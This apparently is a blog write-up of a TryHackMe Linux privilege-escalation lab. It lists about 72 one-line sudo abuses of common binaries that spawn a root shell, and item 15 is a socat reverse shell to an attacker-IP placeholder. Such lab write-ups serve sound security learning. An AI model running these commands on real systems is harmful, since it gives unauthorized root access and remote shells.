Photo by Alex Chumak on Unsplash

This write-up is for getting the root shell on Linux and is based on the Linux Privesc Playground room on https://tryhackme.com/

Login to the box using the :- SSH Credentials given — check the room’s details on THM

Here is the list of all the ways which I could have think of at the time of solving this:

1. nmap --interactive; !sh

2. echo “os.execute(‘/bin/sh’)” > shell.nse && sudo nmap --script=shell.nse

3. sudo awk ‘BEGIN {system(“/bin/sh”)}’

4. sudo find /home -exec /bin/bash \;

5. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

6. sudo less /etc/hosts then !/bin/bash

7. sudo bash

8. sudo perl -e ‘exec “/bin/bash”;’

9. sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’

10. sudo man man

11. sudo vi

12. sudo vim -c ‘!sh’

13. sudo env /bin/bash

14. sudo ftp

15. On Attacker Machine run:
socat file:`tty`,raw,echo=0 tcp-listen:1234
then on Target Machine run:
sudo socat exec:’sh -li’,pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:1234

16. sudo /bin/bash -p

17. sudo -s

18. sudo php -r “system(‘/bin/sh’);”

19. sudo strace -o /dev/null /bin/sh

20. sudo xargs -a /dev/null sh

21. sudo timeout --foreground 7d /bin/sh

22. sudo expect -c ‘spawn /bin/sh;interact’

23. sudo ionice /bin/sh

24. sudo /usr/bin/time /bin/sh

25. sudo taskset 1 /bin/sh

26. sudo flock -u / /bin/sh

27. sudo setarch $(arch) /bin/sh

28. sudo stdbuf -i0 /bin/sh

29. sudo rsync -e ‘sh -c “sh 0<&2 1>&2”’

30. sudo pg /etc/profile

31. sudo nice /bin/sh

32. sudo gdb -nx -ex ‘!sh’ -ex quit

33. sudo dmsetup ls --exec ‘/bin/sh -s’

34. sudo start-stop-daemon -n $RANDOM -S -x /bin/sh

35. sudo logsave /dev/null /bin/sh -i

36. sudo sed -n ‘1e exec sh 1>&0’ /etc/hosts

37. sudo mount -o bind /bin/sh /bin/mount
sudo mount

38. sudo dash

39. sudo ksh

40. sudo ip netns add foo
sudo ip netns exec foo /bin/sh
sudo ip netns delete foo

41. TERM= sudo more /etc/profile

42. sudo zsh

43. sudo less /etc/profile

44. sudo busybox sh

45. sudo run-parts --new-session --regex ‘^sh$’ /bin

46. sudo unshare /bin/sh

47. sudo ltrace -L /bin/sh

48. sudo lua -e ‘os.execute(“/bin/sh”)’

49. sudo mawk ‘BEGIN {system(“/bin/sh”)}’

50. git help config

51. sudo service ../../bin/sh

52. sudo irb
exec ‘/bin/bash’

53. sudo pic -U
sh X sh X

54. sudo puppet apply -e “exec { ‘/bin/sh -c \”exec sh -i <$(tty) >$(tty) 2>$(tty)\”’: }”

55. sudo ssh -o ProxyCommand= ‘;sh 0<&2 1>&2’ x

56. sudo rlwrap /bin/sh

57. sudo ruby -e ‘exec “/bin/sh”’

58. sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

59. TF=$(mktemp -u) then sudo zip $TF /etc/hosts -T -TT ‘sh #’
sudo rm $TF

60. sudo csh

61. TF=$(mktemp -d)
echo “import os; os.execl(‘/bin/sh’, ‘sh’, ‘-c’, ‘sh <$(tty) >$(tty) 2>$(tty)’)” > $TF/setup.py
sudo easy_install $TF

62. sudo emacs -Q -nw --eval ‘(term “/bin/sh”)’

63. sudo tmux

64. sudo screen

65. sudo script -q /dev/null

66. TF=$(mktemp)
echo ‘sh 0<&2 1>&2’ > $TF
chmod +x “$TF”
sudo scp -S $TF x y:

67. sudo rvim -c ‘:py import os; os.execl(“/bin/sh”, “sh”, “-c”, “reset; exec sh”)’

68. TF=$(mktemp -d)
echo “import os; os.execl(‘/bin/sh’, ‘sh’, ‘-c’, ‘sh <$(tty) >$(tty) 2>$(tty)’)” > $TF/setup.py
sudo pip install $TF

69. sudo ash

70. sudo gawk ‘BEGIN {system(“/bin/sh”)}’

71. sudo nawk ‘BEGIN {system(“/bin/sh”)}’

72. vi :set shell=/bin/bash:shell

73. Kernel Exploits:

The flag is at location /root/flag.txt. Read and submit it when you are root 😀

Useful Resources used while solving this:






Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why Product Driven Development (PDD) is Essential for Startups

How a script to save myself time became a core application at work

How to lose weight in a month 10 kg

Exploring the hidden architecture of your codebase

How to Add a Placemark Using Coordinates in Google Earth

Pin on the map

A Visual Designer’s 100 Framer Challenge [002]

“Hello World” in Flutter

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Write-up: Basic clickjacking with CSRF token protection @ PortSwigger Academy

Basic Pentesting — Process Report

picoCTF 2022: Cryptography writeups

Exploiting flask session — SmallMistakeBigMistake [heroctf 2022] by sudo_von